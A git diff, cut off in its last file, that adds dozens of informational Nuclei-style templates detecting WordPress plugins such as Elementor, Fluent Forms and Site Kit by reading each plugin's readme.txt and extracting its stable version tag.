a/technologies/wordpress/wordpress-easy-wp-smtp.yaml b/technologies/wordpress/wordpress-easy-wp-smtp.yaml new file mode 100644 index 0000000000..ffb1f6d674 --- /dev/null +++ b/technologies/wordpress/wordpress-easy-wp-smtp.yaml @@ -0,0 +1,35 @@ + +id: wordpress-easy-wp-smtp + +info: + name: Easy WP SMTP Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/easy-wp-smtp/ + metadata: + plugin_namespace: easy-wp-smtp + wpscan: https://wpscan.com/plugin/easy-wp-smtp + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-elementor.yaml b/technologies/wordpress/wordpress-elementor.yaml new file mode 100644 index 0000000000..f163cce1e4 --- /dev/null +++ b/technologies/wordpress/wordpress-elementor.yaml @@ -0,0 +1,35 @@ + +id: wordpress-elementor + +info: + name: Elementor Website Builder Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/elementor/ + metadata: + plugin_namespace: elementor + wpscan: https://wpscan.com/plugin/elementor + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-elementskit-lite.yaml b/technologies/wordpress/wordpress-elementskit-lite.yaml new file mode 100644 index 0000000000..ed167ad2a6 --- /dev/null +++ b/technologies/wordpress/wordpress-elementskit-lite.yaml @@ -0,0 +1,35 @@ + +id: wordpress-elementskit-lite + +info: + name: ElementsKit Elementor addons (Header Footer Builder, Mega Menu Builder, Free Elementor Widgets & Elementor Templates Library) Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/elementskit-lite/ + metadata: + plugin_namespace: elementskit-lite + wpscan: https://wpscan.com/plugin/elementskit-lite + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-enable-media-replace.yaml b/technologies/wordpress/wordpress-enable-media-replace.yaml new file mode 100644 index 0000000000..f672a793ba --- /dev/null +++ b/technologies/wordpress/wordpress-enable-media-replace.yaml @@ -0,0 +1,35 @@ + +id: wordpress-enable-media-replace + +info: + name: Enable Media Replace Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/enable-media-replace/ + metadata: + plugin_namespace: enable-media-replace + wpscan: https://wpscan.com/plugin/enable-media-replace + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-envato-elements.yaml b/technologies/wordpress/wordpress-envato-elements.yaml new file mode 100644 index 0000000000..6b489a4391 --- /dev/null +++ b/technologies/wordpress/wordpress-envato-elements.yaml @@ -0,0 +1,35 @@ + +id: wordpress-envato-elements + +info: + name: Envato Elements – Photos & Elementor Templates Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/envato-elements/ + metadata: + plugin_namespace: envato-elements + wpscan: https://wpscan.com/plugin/envato-elements + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml new file mode 100644 index 0000000000..398276b712 --- /dev/null +++ b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml @@ -0,0 +1,35 @@ + +id: wordpress-essential-addons-for-elementor-lite + +info: + name: Essential Addons for Elementor Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ + metadata: + plugin_namespace: essential-addons-for-elementor-lite + wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml new file mode 100644 index 0000000000..49e3ed6631 --- /dev/null +++ b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ewww-image-optimizer + +info: + name: EWWW Image Optimizer Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ewww-image-optimizer/ + metadata: + plugin_namespace: ewww-image-optimizer + wpscan: https://wpscan.com/plugin/ewww-image-optimizer + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml new file mode 100644 index 0000000000..49ad57b6bc --- /dev/null +++ b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml @@ -0,0 +1,35 @@ + +id: wordpress-facebook-for-woocommerce + +info: + name: Facebook for WooCommerce Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/facebook-for-woocommerce/ + metadata: + plugin_namespace: facebook-for-woocommerce + wpscan: https://wpscan.com/plugin/facebook-for-woocommerce + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml new file mode 100644 index 0000000000..2a34441578 --- /dev/null +++ b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml @@ -0,0 +1,35 @@ + +id: wordpress-favicon-by-realfavicongenerator + +info: + name: Favicon by RealFaviconGenerator Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ + metadata: + plugin_namespace: favicon-by-realfavicongenerator + wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-flamingo.yaml b/technologies/wordpress/wordpress-flamingo.yaml new file mode 100644 index 0000000000..dd06f63933 --- /dev/null +++ b/technologies/wordpress/wordpress-flamingo.yaml @@ -0,0 +1,35 @@ + +id: wordpress-flamingo + +info: + name: Flamingo Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/flamingo/ + metadata: + plugin_namespace: flamingo + wpscan: https://wpscan.com/plugin/flamingo + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-fluentform.yaml b/technologies/wordpress/wordpress-fluentform.yaml new file mode 100644 index 0000000000..7aab325308 --- /dev/null +++ b/technologies/wordpress/wordpress-fluentform.yaml @@ -0,0 +1,35 @@ + +id: wordpress-fluentform + +info: + name: Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/fluentform/ + metadata: + plugin_namespace: fluentform + wpscan: https://wpscan.com/plugin/fluentform + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/fluentform/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-font-awesome.yaml b/technologies/wordpress/wordpress-font-awesome.yaml new file mode 100644 index 0000000000..0a3089d8f1 --- /dev/null +++ b/technologies/wordpress/wordpress-font-awesome.yaml @@ -0,0 +1,35 @@ + +id: wordpress-font-awesome + +info: + name: Font Awesome Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/font-awesome/ + metadata: + plugin_namespace: font-awesome + wpscan: https://wpscan.com/plugin/font-awesome + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/font-awesome/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml new file mode 100644 index 0000000000..6aa61b906f --- /dev/null +++ b/technologies/wordpress/wordpress-force-regenerate-thumbnails.yaml @@ -0,0 +1,35 @@ + +id: wordpress-force-regenerate-thumbnails + +info: + name: Force Regenerate Thumbnails Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/force-regenerate-thumbnails/ + metadata: + plugin_namespace: force-regenerate-thumbnails + wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/force-regenerate-thumbnails/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-formidable.yaml b/technologies/wordpress/wordpress-formidable.yaml new file mode 100644 index 0000000000..d977966c8b --- /dev/null +++ b/technologies/wordpress/wordpress-formidable.yaml @@ -0,0 +1,35 @@ + +id: wordpress-formidable + +info: + name: Formidable Forms – Contact Form, Survey, Quiz, Calculator & Custom Form Builder Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/formidable/ + metadata: + plugin_namespace: formidable + wpscan: https://wpscan.com/plugin/formidable + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/formidable/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-forminator.yaml b/technologies/wordpress/wordpress-forminator.yaml new file mode 100644 index 0000000000..53eb2646f7 --- /dev/null +++ b/technologies/wordpress/wordpress-forminator.yaml @@ -0,0 +1,35 @@ + +id: wordpress-forminator + +info: + name: Forminator – Contact Form, Payment Form & Custom Form Builder Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/forminator/ + metadata: + plugin_namespace: forminator + wpscan: https://wpscan.com/plugin/forminator + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/forminator/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ga-google-analytics.yaml b/technologies/wordpress/wordpress-ga-google-analytics.yaml new file mode 100644 index 0000000000..3aa6124521 --- /dev/null +++ b/technologies/wordpress/wordpress-ga-google-analytics.yaml @@ -0,0 +1,35 @@ + +id: wordpress-ga-google-analytics + +info: + name: GA Google Analytics Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/ga-google-analytics/ + metadata: + plugin_namespace: ga-google-analytics + wpscan: https://wpscan.com/plugin/ga-google-analytics + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/ga-google-analytics/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml new file mode 100644 index 0000000000..1f88894df5 --- /dev/null +++ b/technologies/wordpress/wordpress-google-analytics-dashboard-for-wp.yaml @@ -0,0 +1,35 @@ + +id: wordpress-google-analytics-dashboard-for-wp + +info: + name: ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ + metadata: + plugin_namespace: google-analytics-dashboard-for-wp + wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/google-analytics-dashboard-for-wp/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml new file mode 100644 index 0000000000..d6900299a0 --- /dev/null +++ b/technologies/wordpress/wordpress-google-analytics-for-wordpress.yaml @@ -0,0 +1,35 @@ + +id: wordpress-google-analytics-for-wordpress + +info: + name: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy) Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/google-analytics-for-wordpress/ + metadata: + plugin_namespace: google-analytics-for-wordpress + wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/google-analytics-for-wordpress/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-listings-and-ads.yaml b/technologies/wordpress/wordpress-google-listings-and-ads.yaml new file mode 100644 index 0000000000..95f8167b77 --- /dev/null +++ b/technologies/wordpress/wordpress-google-listings-and-ads.yaml @@ -0,0 +1,35 @@ + +id: wordpress-google-listings-and-ads + +info: + name: Google Listings & Ads Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/google-listings-and-ads/ + metadata: + plugin_namespace: google-listings-and-ads + wpscan: https://wpscan.com/plugin/google-listings-and-ads + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/google-listings-and-ads/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-site-kit.yaml b/technologies/wordpress/wordpress-google-site-kit.yaml new file mode 100644 index 0000000000..5addb0fd39 --- /dev/null +++ b/technologies/wordpress/wordpress-google-site-kit.yaml @@ -0,0 +1,35 @@ + +id: wordpress-google-site-kit + +info: + name: Site Kit by Google – Analytics, Search Console, AdSense, Speed Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/google-site-kit/ + metadata: + plugin_namespace: google-site-kit + wpscan: https://wpscan.com/plugin/google-site-kit + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/google-site-kit/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-google-sitemap-generator.yaml b/technologies/wordpress/wordpress-google-sitemap-generator.yaml new file mode 100644 index 0000000000..2ebe4ea6cc --- /dev/null +++ b/technologies/wordpress/wordpress-google-sitemap-generator.yaml @@ -0,0 +1,35 @@ + +id: wordpress-google-sitemap-generator + +info: + name: XML Sitemaps Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/google-sitemap-generator/ + metadata: + plugin_namespace: google-sitemap-generator + wpscan: https://wpscan.com/plugin/google-sitemap-generator + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/google-sitemap-generator/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-gtranslate.yaml b/technologies/wordpress/wordpress-gtranslate.yaml new file mode 100644 index 0000000000..a3afa21fcc --- /dev/null +++ b/technologies/wordpress/wordpress-gtranslate.yaml @@ -0,0 +1,35 @@ + +id: wordpress-gtranslate + +info: + name: Translate WordPress with GTranslate Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/gtranslate/ + metadata: + plugin_namespace: gtranslate + wpscan: https://wpscan.com/plugin/gtranslate + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/gtranslate/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-gutenberg.yaml b/technologies/wordpress/wordpress-gutenberg.yaml new file mode 100644 index 0000000000..a239ddcdc7 --- /dev/null +++ b/technologies/wordpress/wordpress-gutenberg.yaml @@ -0,0 +1,35 @@ + +id: wordpress-gutenberg + +info: + name: Gutenberg Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/gutenberg/ + metadata: + plugin_namespace: gutenberg + wpscan: https://wpscan.com/plugin/gutenberg + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/gutenberg/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-happy-elementor-addons.yaml b/technologies/wordpress/wordpress-happy-elementor-addons.yaml new file mode 100644 index 0000000000..03b08a4487 --- /dev/null +++ b/technologies/wordpress/wordpress-happy-elementor-addons.yaml @@ -0,0 +1,35 @@ + +id: wordpress-happy-elementor-addons + +info: + name: Happy Addons for Elementor Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/happy-elementor-addons/ + metadata: + plugin_namespace: happy-elementor-addons + wpscan: https://wpscan.com/plugin/happy-elementor-addons + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/happy-elementor-addons/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-and-footer-scripts.yaml b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml new file mode 100644 index 0000000000..77f6822157 --- /dev/null +++ b/technologies/wordpress/wordpress-header-and-footer-scripts.yaml @@ -0,0 +1,35 @@ + +id: wordpress-header-and-footer-scripts + +info: + name: Header and Footer Scripts Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/header-and-footer-scripts/ + metadata: + plugin_namespace: header-and-footer-scripts + wpscan: https://wpscan.com/plugin/header-and-footer-scripts + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/header-and-footer-scripts/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-footer-code-manager.yaml b/technologies/wordpress/wordpress-header-footer-code-manager.yaml new file mode 100644 index 0000000000..91e8c49c0f --- /dev/null +++ b/technologies/wordpress/wordpress-header-footer-code-manager.yaml @@ -0,0 +1,35 @@ + +id: wordpress-header-footer-code-manager + +info: + name: Header Footer Code Manager Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/header-footer-code-manager/ + metadata: + plugin_namespace: header-footer-code-manager + wpscan: https://wpscan.com/plugin/header-footer-code-manager + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-code-manager/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-footer-elementor.yaml b/technologies/wordpress/wordpress-header-footer-elementor.yaml new file mode 100644 index 0000000000..85ee27fcf7 --- /dev/null +++ b/technologies/wordpress/wordpress-header-footer-elementor.yaml @@ -0,0 +1,35 @@ + +id: wordpress-header-footer-elementor + +info: + name: Elementor Header & Footer Builder Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/header-footer-elementor/ + metadata: + plugin_namespace: header-footer-elementor + wpscan: https://wpscan.com/plugin/header-footer-elementor + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer-elementor/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-header-footer.yaml b/technologies/wordpress/wordpress-header-footer.yaml new file mode 100644 index 0000000000..5c86a25430 --- /dev/null +++ b/technologies/wordpress/wordpress-header-footer.yaml @@ -0,0 +1,35 @@ + +id: wordpress-header-footer + +info: + name: Head, Footer and Post Injections Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/header-footer/ + metadata: + plugin_namespace: header-footer + wpscan: https://wpscan.com/plugin/header-footer + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/header-footer/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-health-check.yaml b/technologies/wordpress/wordpress-health-check.yaml new file mode 100644 index 0000000000..ee0d16bb89 --- /dev/null +++ b/technologies/wordpress/wordpress-health-check.yaml @@ -0,0 +1,35 @@ + +id: wordpress-health-check + +info: + name: Health Check & Troubleshooting Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/health-check/ + metadata: + plugin_namespace: health-check + wpscan: https://wpscan.com/plugin/health-check + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/health-check/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-hello-dolly.yaml b/technologies/wordpress/wordpress-hello-dolly.yaml new file mode 100644 index 0000000000..8d5ce9e57e --- /dev/null +++ b/technologies/wordpress/wordpress-hello-dolly.yaml @@ -0,0 +1,35 @@ + +id: wordpress-hello-dolly + +info: + name: Hello Dolly Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/hello-dolly/ + metadata: + plugin_namespace: hello-dolly + wpscan: https://wpscan.com/plugin/hello-dolly + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/hello-dolly/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-imagify.yaml b/technologies/wordpress/wordpress-imagify.yaml new file mode 100644 index 0000000000..0e5dada799 --- /dev/null +++ b/technologies/wordpress/wordpress-imagify.yaml @@ -0,0 +1,35 @@ + +id: wordpress-imagify + +info: + name: Imagify – Optimize Images & Convert WebP | Compress Images Easily Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/imagify/ + metadata: + plugin_namespace: imagify + wpscan: https://wpscan.com/plugin/imagify + tags: tech,wordpress,plugin,top-100 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/imagify/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-imsanity.yaml b/technologies/wordpress/wordpress-imsanity.yaml new file mode 100644 index 0000000000..c8ef58a742 --- /dev/null +++ b/technologies/wordpress/wordpress-imsanity.yaml @@ -0,0 +1,35 @@ + +id: wordpress-imsanity + +info: + name: Imsanity Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/imsanity/ + metadata: + plugin_namespace: imsanity + wpscan: https://wpscan.com/plugin/imsanity + tags: tech,wordpress,plugin,top-200 + +requests: + - method: GET + redirects: true + max-redirects: 2 + path: + - "{{BaseURL}}/wp-content/plugins/imsanity/readme.txt" + matchers-condition: and + matchers: + - type: regex + regex: + - '(?i)Stable.Tag' + - type: status + status: + - 200 + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-insert-headers-and-footers.yaml b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml new file mode 100644 index 0000000000..feeffbfba4 --- /dev/null +++ b/technologies/wordpress/wordpress-insert-headers-and-footers.yaml @@ -0,0 +1,35 @@ + +id: wordpress-insert-headers-and-footers + +info: + name: WPCode – Insert Headers and Footers + Custom Code Snippets – WordPress Code Manager Detection + author: ricardomaia + severity: info + reference: + - https://wordpress.org/plugins/insert-headers-and-footers/ + metadata: + plugin_namespace: insert-headers-and-footers + wpscan: 